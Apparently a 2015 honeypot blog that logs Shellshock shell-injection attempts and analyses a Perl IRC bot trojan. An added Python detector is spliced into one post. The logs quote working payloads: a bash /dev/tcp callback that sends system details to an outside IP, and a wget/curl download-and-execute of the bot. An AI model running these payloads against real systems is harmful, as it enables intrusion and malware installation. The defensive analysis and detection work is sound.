Thursday, 18 June 2015

Shell injection attack: /dev/tcp/74.208.79.34/21 -- bash echo

My honeypot was attacked by:
Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" 213.165.70.245 DE SHELLinjection
So, what is happening here:
  1. I needed to ask the experts what could be done via "> /dev/tcp/74.208.79.34/21". The answer is quite simple: a feature of bash makes a redirection to such a path open a TCP connection to 74.208.79.34 on port 21.
  2. The attacker tried to report the vulnerability of my server to the IP address embedded in the attack.
  3. He tried it via both TCP and UDP.
The source of the attack was 213.165.70.245, a server hosted by "1&1 Internet Inc."

The reporting destination was 74.208.79.34, a server hosted by the same company.

Sunday, 14 June 2015

JST IrcBot revisited

Maybe you remember the shell injection I reported yesterday.
This morning I took the time to read through the code a bit:

 JST Perl IrcBot v3.0 / 2011 by FrankBlack @ Millenium Group
 Stealth MultiFunctional IrcBot writen in Perl
 Teste on every system with PERL instlled     

 This is a free program used on your own risk.  
 Created for educational purpose only.             
 I'm not responsible for the illegal use of this program. 


The bot has some nice features and is very nicely written.
Again the software is detected by clamscan:

den: Trojan.IRCBot-1142
and, if it is not a mistake (the origin address was not changed), even though it looks like an example domain, the domain responds to ping and the IRC server runs :-)



Perl script injection: 85.214.60.234/den

Over the last two days several shell injections have hit my honeypot. Each of them tried to download a Perl script and execute it:

Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection
I downloaded the file manually; it is a Perl IRC bot.
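As an added example (not code from this blog, and not the honeypot's own tooling), here is a small Python detector that covers both the /dev/tcp callback payload from the 18 June post and the wget/curl download-and-execute payload above: it flags log lines carrying the "() { :;};" prefix and extracts the indicators a responder would pivot on (attacking client, callback host and port, download URL, interpreter and dropped file). The two honeypot lines quoted in the posts are reused as sample input; the third, benign line and its 198.51.100.7 address are constructed.

```python
"""Spot Shellshock-style shell injections in honeypot/web-server log lines and
pull out the responder-relevant indicators. Added example, not the blog's code."""
import re
from dataclasses import dataclass, field

# The "() { :;};" prefix is the bash function-definition string that the
# environment-import bug turns into executed commands.
MARKER = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
IPV4 = r'\d{1,3}(?:\.\d{1,3}){3}'
# client address as it appears in the combined-log part of the line
CLIENT = re.compile(r'(' + IPV4 + r') - - \[')
# bash network-redirection pseudo-paths (interpreted by bash itself, not the kernel)
NET_REDIRECT = re.compile(r'/dev/(tcp|udp)/(' + IPV4 + r')/(\d{1,5})')
# wget/curl, optional flags, then the URL (ends at ';', whitespace, quote or backslash)
DOWNLOAD = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*((?:https?://)?\S+?)(?=[;\s"\\])')
# an interpreter handed a file name (an option such as "bash -c" is not a file)
EXEC = re.compile(r'\b(perl|python|sh|bash)\s+([A-Za-z0-9_./][A-Za-z0-9_./-]*)')


@dataclass
class Finding:
    client: str
    callbacks: set = field(default_factory=set)   # (proto, host, port)
    downloads: set = field(default_factory=set)   # URLs fetched with wget/curl
    executes: set = field(default_factory=set)    # (interpreter, file)

    def classify(self):
        """Coarse tags for triage."""
        tags = ['shell-injection']
        if self.callbacks:
            tags.append('callback')            # data pushed out over a raw socket
        if self.downloads and self.executes:
            tags.append('download-and-execute')
        return tags


def analyse(line):
    """Return a Finding for a line carrying the injection marker, else None."""
    m = MARKER.search(line)
    if not m:
        return None
    payload = line[m.start():]   # only the injected part, not the request line
    c = CLIENT.search(line)
    finding = Finding(c.group(1) if c else 'unknown')
    for proto, host, port in NET_REDIRECT.findall(payload):
        finding.callbacks.add((proto, host, int(port)))
    finding.downloads.update(DOWNLOAD.findall(payload))
    finding.executes.update(EXEC.findall(payload))
    return finding


def scan(log_text):
    """Analyse every line; keep only the ones that carried an injection."""
    return [f for f in map(analyse, log_text.splitlines()) if f]


# Constructed sample: the two honeypot lines quoted in the posts plus one
# ordinary request (198.51.100.7 is a documentation address, made up here).
SAMPLE_LOG = r'''Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" 213.165.70.245 DE SHELLinjection
Jun 13 06:42:11 beeswarm [mypyfwa] 2015-06-13 06:42:11.531828 74.208.167.71 - - [12/Jun/2015:20:25:25 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" "() { :;}; cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;rm -fr den*\"" 74.208.167.71 US SHELLinjection
Jun 18 06:42:09 beeswarm [mypyfwa] 2015-06-18 06:42:09.000000 198.51.100.7 - - [18/Jun/2015:06:42:09 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0" 198.51.100.7 XX normal'''

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f.client, f.classify(), f.callbacks, f.downloads, f.executes)
```

Running it prints one line per hit with its tags. Two things the output makes visible: /dev/tcp and /dev/udp are not real device files on Linux, bash itself recognises the path and opens the socket, so the callback variant works on a host without wget or curl (a bash built with --disable-net-redirections treats such a path as an ordinary file name); and the download-and-execute variant names the same address in both the downloader and the later perl command, which makes the URL a usable blocklist entry.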

 /XFupload.py -f den
{"malware":{"type":"md5","md5":"0x7AE21F4543FE5F842A7BB9F79D95A88E","origins":{"external":{"detectionCoverage":35,"family":["trojan"]}}}}
and
clamscan den
den: Trojan.IRCBot-1142 FOUND
The sources of the attack are:
  • 223.252.35.159 (AU)
  • 74.208.167.71 (US)
Both hosts seem to be hosted servers (1and1 and Ozservers).

The Perl script seems to have been written by "Jericho Security Team Perl Bot v3.0".
Strangely, the server address within the script is set to
place.youredomainhere.net

Even stranger, this domain is hosted by Schlund:

inetnum:        87.106.0.0 - 87.106.15.255
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG
country:        DE